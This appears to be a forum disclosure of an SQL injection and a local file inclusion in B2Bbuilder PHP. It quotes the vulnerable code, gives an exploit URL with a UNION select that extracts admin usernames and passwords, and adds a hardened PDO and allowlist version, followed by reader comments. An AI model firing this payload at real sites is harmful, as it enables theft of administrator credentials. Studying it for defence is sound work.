B2Bbuilder PHP SQL injection
wap/index.php and news_cat.php: any malformed statement is enough to obtain the database prefix
// wap/index.php: $action is checked against a fixed list before the require
if (!empty($_GET["action"]))
    $action=$_GET["action"];
else
    $action="home";
//$action=empty($action)?"home":$_GET["action"];
//===============================
if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','corporate_detail','search','corporate_moredetail','product_showimg')))
{
    require 'inc/'.$action.'.php';
}

// news_cat.php (loaded by the require above when action=news_cat):
// $nid comes straight from the query string and is concatenated into the SQL unfiltered
if(!empty($_GET['nid']))
{
    $nid=$_GET['nid'];
    $sql="select * from ".NEWSCAT." where pid=$nid";
    $db->query($sql);
    $sre=$db->getRows();
    if(count($sre)>0)
    {
        foreach($sre as $v)
        {
            echo "[资讯]<a href='?action=news_list&newsid=".$v['catid']."'>".$v['cat']."</a><br/>";
        }
        echo "<br/> <a href='?action=news_cat'><i>返回</i></a><br/>";
        //echo " <anchor>后退<prev/></anchor><br/>";
    }
    else
    {
        header("Location:./?action=news_list&nid=".$nid);
        exit();
    }
}
exp: http://site/b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20<database_prefix>_admin
Local file inclusion. Limited by magic_quotes_gpc.
module/news/admin/newscat.php
include_once("../module/".$_GET['m']."/includes/news_function.php");
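A hardened form of the two input paths shown above (the nid query and the $_GET['m'] include), as an added example that is not part of the original post or of B2Bbuilder's code. It assumes PDO with the sqlite driver in place of the application's $db wrapper; the table name demo_newscat, the module list and the helper names are hypothetical.

```php
<?php
// Added example, not B2Bbuilder code. Assumptions: PDO (sqlite driver) replaces the
// application's $db wrapper; table, module list and helper names are constructed.

// nid must be a positive integer; anything else (e.g. "17 and 1=2") is rejected.
function parse_nid($raw): ?int
{
    $nid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $nid === false ? null : $nid;
}

// The module name is matched against a fixed list, the same in_array() approach
// wap/index.php already uses for $action, so no path characters reach include_once.
function resolve_module($raw, array $allowed): ?string
{
    return (is_string($raw) && in_array($raw, $allowed, true)) ? $raw : null;
}

// The value is bound as a typed parameter; $table is a code constant, never user input.
function fetch_subcats(PDO $pdo, string $table, int $nid): array
{
    $stmt = $pdo->prepare("SELECT catid, cat FROM $table WHERE pid = :pid");
    $stmt->bindValue(':pid', $nid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_newscat (catid INTEGER, cat TEXT, pid INTEGER)');
$pdo->exec("INSERT INTO demo_newscat VALUES (21, 'Industry', 17), (22, 'Company', 17)");

foreach (['17', '17 and 1=2'] as $raw) {
    $nid = parse_nid($raw);
    if ($nid === null) {
        echo "rejected nid\n"; // answer with a generic error, never the SQL error text
        continue;
    }
    foreach (fetch_subcats($pdo, 'demo_newscat', $nid) as $row) {
        // Escape on output too: the original echoes database values straight into HTML.
        echo htmlspecialchars($row['cat'], ENT_QUOTES, 'UTF-8'), "\n";
    }
}
var_dump(resolve_module('news', ['news', 'product']));
var_dump(resolve_module('../../etc', ['news', 'product']));
```

Because the include no longer depends on magic_quotes_gpc, the check holds on PHP versions where that setting has been removed.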
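8 comments
Bookmarking this, I can test it when I come across it!!!
Nothing is filtered at all~~~~
Nice, learned something
Here to learn
Didn't expect this program to have injections like this, really impressive~~ Inclusion and injection, well done~
This program, such a blatant injection
Nice
Learned something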